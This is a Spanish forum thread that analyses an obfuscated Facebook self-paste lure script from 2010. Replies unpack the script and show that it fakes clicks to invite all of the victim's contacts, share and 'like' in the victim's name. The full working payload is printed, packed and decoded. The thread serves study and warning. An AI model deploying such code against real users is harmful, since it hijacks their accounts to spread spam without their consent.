[javascript] para quien se aburra

Iniciado por Ragnarok, 6 Julio 2010, 21:22 PM


Ragnarok

Me han invitado a un grupo de facebook: "99% of people can't watch this video more than 25 seconds"

Allí te dicen que vayas a esta dirección, que es un script:

// Analysis sample: a `javascript:` URL that the lure asks the reader to run in the
// browser, so the code executes inside whatever page is open at that moment.
// Structure, as visible below:
//   1. five globals (a, b, hzgjtD, yhXHmG, BWKgQn) are set to element ids that all
//      share the prefix `app107489592636080_`;
//   2. an eval(function(p,a,c,k,e,r){...}) wrapper rebuilds the real script: the
//      payload string has its words replaced by base-62 tokens, and the
//      '|'-separated list at the end is the dictionary they index into;
//   3. the rebuilt text is handed straight to eval().
// The payload itself stores property and method names as \xNN escapes, so nothing
// readable (getElementById, dispatchEvent, ...) appears in the packed form.
// To inspect it without running it, work in an isolated environment and replace the
// outer `eval` with a call that prints its argument; the replies further down show
// the result of that unpacking.
// NOTE(review): the line break after `1e ` falls inside the quoted payload and looks
// like an artifact of how the page was captured - confirm against the original post.
javascript:(function(){a='app107489592636080_PKhcGc';b='app107489592636080_xKbQFX';hzgjtD='app107489592636080_hzgjtD';yhXHmG='app107489592636080_yhXHmG';BWKgQn='app107489592636080_BWKgQn';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e 
F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'),0,{}))})();

No os quejaréis, que os lo doy con colores y todo...

El caso es que me da igual lo que haga la función, me da igual el vídeo y en general me da igual lo que pase en facebook, para mí es una libreta de direcciones con trackback. Y desde luego no me voy a poner a ejecutar tronchos de javascript que no sé lo que hacen, de dónde vienen ni los controles que pueden haber pasado. Tal vez en una máquina virtual, si tuviera tiempo e interés. Pero he pensado que os puede interesar a los que estéis aprendiendo javascript, ofuscación, etc.

Shell Root

#1
Des-Ofuscando un poco el código.
// Same sample as the original post, re-indented only: the packed payload and its
// dictionary are unchanged, so this listing still unpacks and runs the script if it
// is executed. Read it, do not paste it into a browser session.
javascript: (function() {
   // Element ids the unpacked script looks up later; all carry the same
   // `app107489592636080_` prefix.
   a = 'app107489592636080_PKhcGc';
   b = 'app107489592636080_xKbQFX';
   hzgjtD = 'app107489592636080_hzgjtD';
   yhXHmG = 'app107489592636080_yhXHmG';
   BWKgQn = 'app107489592636080_BWKgQn';
   // Unpacker. p = packed payload, a = radix (62), c = dictionary size (85),
   // k = dictionary words, e = token encoder, r = lookup table.
   // Its return value is the rebuilt source text, which eval() then executes.
   eval(function(p, a, c, k, e, r) {
       // Turns a dictionary index into its token: base-`a` digits, using 0-9a-z
       // (toString(36)) for values up to 35 and char code value+29 above that.
       e = function(c) {
           return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
       };
       // Feature test: does String.replace accept a function as the replacement?
       // If so, build the token -> word table once and switch to a single pass
       // that matches every word (\w+) and maps it through that table.
       if (!''.replace(/^/, String)) {
           // Empty dictionary slots map a token to itself (k[c] || e(c)).
           while (c--) r[e(c)] = k[c] || e(c);
           k = [function(e) {
               return r[e]
           }];
           e = function() {
               return '\\w+'
           };
           c = 1
       };
       // Substitution loop: one pass in the fast path above, otherwise one
       // whole-word regex replace per non-empty dictionary entry.
       while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
       return p
   } ('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);', 62, 85, '||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'), 0, {}))
})();


Otro poco más de Des-Ofuscación:
// Unpacked payload. Every DOM property, method name and string it needs is kept in
// this array as \xNN escapes and reached by index, so the script body contains no
// readable API names. Decoded value of each entry is given alongside.
// The ids a, b, BWKgQn, yhXHmG and hzgjtD are globals set by the wrapper shown in the
// earlier listings; fs and SocialGraphManager are not defined anywhere in this
// thread - presumably objects of the page the script runs in; verify.
var variables = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", // [0] "visibility"
"\x73\x74\x79\x6C\x65", // [1] "style"
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", // [2] "getElementById"
"\x68\x69\x64\x64\x65\x6E", // [3] "hidden"
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", // [4] "innerHTML"
"\x76\x61\x6C\x75\x65", // [5] "value"
"\x73\x75\x67\x67\x65\x73\x74", // [6] "suggest"
"\x6C\x69\x6B\x65\x6D\x65", // [7] "likeme"
"\x73\x6C\x69\x6E\x6B", // [8] "slink"
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73", // [9] "MouseEvents"
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74", // [10] "createEvent"
"\x63\x6C\x69\x63\x6B", // [11] "click"
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74", // [12] "initEvent"
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74", // [13] "dispatchEvent"
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C", // [14] "select_all"
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D", // [15] "sgm_invite_form"
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70", // [16] "/ajax/social_graph/invite_dialog.php"
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67", // [17] "submitDialog"
"\x69\x6E\x70\x75\x74", // [18] "input"
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", // [19] "getElementsByTagName"
"\x53\x68\x61\x72\x65", // [20] "Share"
"\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"]; // [21] "pop_content" (not referenced below)
d = document;
// document.getElementById(BWKgQn).style.visibility = "hidden": hides one page element.
d[variables[2]](BWKgQn)[variables[1]][variables[0]] = variables[3];
// Writes the .value of element b into element a as innerHTML, i.e. markup held in a
// form field is inserted into the live page.
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
// Handles to the elements with ids "suggest", "likeme" and "slink".
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
// Builds a synthetic mouse "click" event (bubbling, cancelable) and fires it on
// "suggest": the click comes from the script, not from the user.
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);

// After 5 s: fs.select_all(). Presumably selects every entry in the dialog opened by
// the click above - fs is not defined in this listing; confirm.
setTimeout(function() {fs[variables[14]]()}, 5000);

// Also after 5 s: SocialGraphManager.submitDialog("sgm_invite_form",
// "/ajax/social_graph/invite_dialog.php"), then a chain of further timed clicks.
setTimeout(function() {
   SocialGraphManager[variables[17]](variables[15], variables[16]);
   setTimeout(function() {
       // 3 s later: re-initialise the click event and fire it on "slink".
       c[variables[12]](variables[11], true, true);
       sl[variables[13]](c);
       setTimeout(function() {
           // 4 s later: fire the click on every <input> whose value is "Share",
           // then on "likeme".
           inp = document[variables[19]](variables[18]);
           for (i in inp) {
               if (inp[i][variables[5]] == variables[20]) {
                   inp[i][variables[13]](c)
               }
           };
           m[variables[13]](c);
           setTimeout(function() {
               // 2 s later: replace the markup of element yhXHmG with the .value of
               // element hzgjtD (same field-to-innerHTML pattern as above).
               d[variables[2]](yhXHmG)[variables[4]] = d[variables[2]](hzgjtD)[variables[5]];
           }, 2000)
       }, 4000)
   }, 3000)
}, 5000);


Y una Des-Ofuscación total podría ser algo así:
// Hand-written, readable paraphrase of the unpacked script ("could be something like
// this", in the poster's words). It is a reading aid, not a faithful equivalent: the
// NOTE(review) comments mark where it departs from the decoded listing above.
// Overall sequence it describes: hide one element, inject markup taken from a form
// field, then drive the page with synthetic clicks on a timer (suggest -> select all
// -> submit the invite form -> "slink" -> every "Share" input -> "likeme").
// NOTE(review): `sytle` - the decoded string is "style"; transcription typo.
document.getElementById(BWKgQn).sytle.visibility="hidden";
// NOTE(review): the decoded listing calls getElementById on `document` both times.
document.getElementById(a).innerHTML = getElementById(b).value;
// NOTE(review): suggest, likeme and slink are string ids ("suggest", "likeme",
// "slink") in the decoded listing, not variables.
s = document.getElementById(suggest);
m = document.getElementById(likeme);
sl = document.getElementById(slink);
// NOTE(review): the decoded listing creates the event and calls initEvent in two
// separate statements, so `c` holds the event object; chained like this, `c` would
// receive initEvent's return value instead. "click" is a string there.
c = document.createEvent("MouseEvents").initEvent(click, true, true);
document.getElementById(suggest).dispatchEvent(c);

// After 5 s: select everything in the dialog (fs is not defined in this thread).
setTimeout(function() {fs.select_all()}, 5000);
// Also after 5 s: submit the invite form, then continue the timed click chain.
setTimeout(function() {
   SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
   setTimeout(function() {
// NOTE(review): the decoded listing re-initialises the existing event `c` and
// dispatches it on `sl` (element "slink"); `suggestLink` and the string "mouseEvent"
// do not appear in it.
document.createEvent("MouseEvents").initEvent("click", true, true);
suggestLink.dispatchEvent("mouseEvent");
setTimeout(function() {
// NOTE(review): the tag name is the string "input" in the decoded listing.
inp = document.getElementsByTagName(input);
// Synthetic click on every input whose value is "Share".
for (i in inp) {
if (inp[i].value == "Share") {
inp[i].dispatchEvent(c)
}
};

// Synthetic click on the "likeme" element.
document.getElementById(likeme).dispatchEvent(c);

// 2 s later: replace the markup of element yhXHmG with the value of element hzgjtD.
setTimeout(function() {
document.getElementById(yhXHmG).innerHTML = document.getElementById(hzgjtD).value;
}, 2000)
}, 4000)
}, 3000)
}, 5000);


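Nota: Interesante código, aunque fácil de des-ofuscar. Prácticamente se trata de ¡SPAM!: el script simula clics para enviar la invitación a todos los contactos seleccionados, pulsar «Share» y darle a «likeme» en nombre de quien lo ejecuta. Jojjojojojo, me gustó; si tienen más, ¡ponedlos!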